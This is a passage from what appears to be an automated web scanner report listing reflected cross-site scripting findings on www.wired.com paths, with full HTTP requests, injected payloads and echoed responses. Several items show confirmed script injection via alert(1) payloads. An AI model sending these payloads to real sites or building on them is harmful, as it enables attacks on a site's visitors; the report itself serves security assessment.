The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7412d"><a>a492ab7c0f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbiz/people7412d"><a>a492ab7c0f7 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=581
Expires: Sun, 21 Nov 2010 23:23:26 GMT
Date: Sun, 21 Nov 2010 23:13:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbiz ss_people7412d"><a>a492ab7c0f7">
...[SNIP]...

1.833. http://www.wired.com/techbiz/startups [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz/startups

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c4ec"><a>b21ee57f40a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbiz7c4ec"><a>b21ee57f40a/startups HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29368
Vary: Accept-Encoding
Cache-Control: max-age=229
Expires: Sun, 21 Nov 2010 23:17:12 GMT
Date: Sun, 21 Nov 2010 23:13:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbiz7c4ec"><a>b21ee57f40a ss_startups">
...[SNIP]...

1.834. http://www.wired.com/techbiz/startups [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /techbiz/startups

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ebc6"><a>440513c64db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /techbiz/startups8ebc6"><a>440513c64db HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29368
Vary: Accept-Encoding
Cache-Control: max-age=553
Expires: Sun, 21 Nov 2010 23:23:09 GMT
Date: Sun, 21 Nov 2010 23:13:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_techbiz ss_startups8ebc6"><a>440513c64db">
...[SNIP]...

1.835. http://www.wired.com/user/login [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63498"><a>895b28be6ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user63498"><a>895b28be6ed/login?returnto=http://howto.wired.com/wiki/Main_Page HTTP/1.1
Accept: */*
Referer: http://howto.wired.com/wiki/Main_Page
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.wired.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29336
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 21:02:58 GMT
Date: Sun, 21 Nov 2010 20:58:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user63498"><a>895b28be6ed ss_login">
...[SNIP]...

1.836. http://www.wired.com/user/login [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/login

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba3b0"><a>461b3fd1bab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/loginba3b0"><a>461b3fd1bab?returnto=http://howto.wired.com/wiki/Main_Page HTTP/1.1
Accept: */*
Referer: http://howto.wired.com/wiki/Main_Page
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.wired.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29336
Vary: Accept-Encoding
Expires: Sun, 21 Nov 2010 20:59:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 21 Nov 2010 20:59:29 GMT
Connection: close
Set-Cookie: JSESSIONID=abcv2cbFPUzA1926-oWXs; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_loginba3b0"><a>461b3fd1bab">
...[SNIP]...

1.837. http://www.wired.com/user/logout [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/logout

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f87df"><a>50a8217cd8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /userf87df"><a>50a8217cd8e/logout HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29338
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:12:42 GMT
Date: Mon, 22 Nov 2010 01:08:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_userf87df"><a>50a8217cd8e ss_logout">
...[SNIP]...

1.838. http://www.wired.com/user/logout [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/logout

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70dfe"><a>d376a663b5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/logout70dfe"><a>d376a663b5f HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Expires: Mon, 22 Nov 2010 01:09:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Nov 2010 01:09:38 GMT
Content-Length: 29338
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_logout70dfe"><a>d376a663b5f">
...[SNIP]...

1.839. http://www.wired.com/user/registration [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/registration

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4d9d"><a>3e10b0ccb95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /userc4d9d"><a>3e10b0ccb95/registration HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29350
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 22:12:39 GMT
Date: Sun, 21 Nov 2010 22:08:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_userc4d9d"><a>3e10b0ccb95 ss_registration">
...[SNIP]...

1.840. http://www.wired.com/user/registration [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/registration

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 448ce"><a>b37556daedd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/registration448ce"><a>b37556daedd HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29350
Vary: Accept-Encoding
Expires: Sun, 21 Nov 2010 22:09:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 21 Nov 2010 22:09:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_registration448ce"><a>b37556daedd">
...[SNIP]...

1.841. http://www.wired.com/video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d3d5"><a>c3b051b443f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video9d3d5"><a>c3b051b443f HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29323
Vary: Accept-Encoding
Cache-Control: max-age=293
Expires: Mon, 22 Nov 2010 01:13:27 GMT
Date: Mon, 22 Nov 2010 01:08:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video9d3d5"><a>c3b051b443f">
...[SNIP]...

1.842. http://www.wired.com/video/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f3df"><a>3f6a5eb5ba0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video6f3df"><a>3f6a5eb5ba0/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29324
Vary: Accept-Encoding
Cache-Control: max-age=275
Expires: Sun, 21 Nov 2010 20:02:51 GMT
Date: Sun, 21 Nov 2010 19:58:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video6f3df"><a>3f6a5eb5ba0">
...[SNIP]...

1.843. http://www.wired.com/video/alt-text [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/alt-text

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload ed94e--><script>alert(1)</script>ca386b88b06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videoed94e--><script>alert(1)</script>ca386b88b06/alt-text HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=283
Expires: Mon, 22 Nov 2010 00:52:44 GMT
Date: Mon, 22 Nov 2010 00:48:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videoed94e--><script>alert(1)</script>ca386b88b06/alt-text
-->
...[SNIP]...

1.844. http://www.wired.com/video/alt-text [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/alt-text

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30ff3"><a>102785f865 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video30ff3"><a>102785f865/alt-text HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29342
Vary: Accept-Encoding
Cache-Control: max-age=293
Expires: Mon, 22 Nov 2010 00:51:59 GMT
Date: Mon, 22 Nov 2010 00:47:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video30ff3"><a>102785f865 ss_alt-text">
...[SNIP]...

1.845. http://www.wired.com/video/alt-text [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/alt-text

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef29"><a>6775e296f7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/alt-text9ef29"><a>6775e296f7d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=270
Expires: Mon, 22 Nov 2010 00:52:34 GMT
Date: Mon, 22 Nov 2010 00:48:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106675


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_alt-text9ef29"><a>6775e296f7d">
...[SNIP]...

1.846. http://www.wired.com/video/alt-text [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/alt-text

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4866"-alert(1)-"6c561f6f03b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/alt-textc4866"-alert(1)-"6c561f6f03b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:54:07 GMT
Date: Mon, 22 Nov 2010 00:49:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106716


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "alt-textc4866"-alert(1)-"6c561f6f03b","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.847. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/avatar-extended-collectors-edition/628119810001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 2fae8--><script>alert(1)</script>093987d625e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video2fae8--><script>alert(1)</script>093987d625e/avatar-extended-collectors-edition/628119810001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29457
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:59:46 GMT
Date: Mon, 22 Nov 2010 00:54:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video2fae8--><script>alert(1)</script>093987d625e/avatar-extended-collectors-edition/628119810001
-->
...[SNIP]...

1.848. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/avatar-extended-collectors-edition/628119810001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40544"><a>75e6bfb0ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video40544"><a>75e6bfb0ef/avatar-extended-collectors-edition/628119810001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
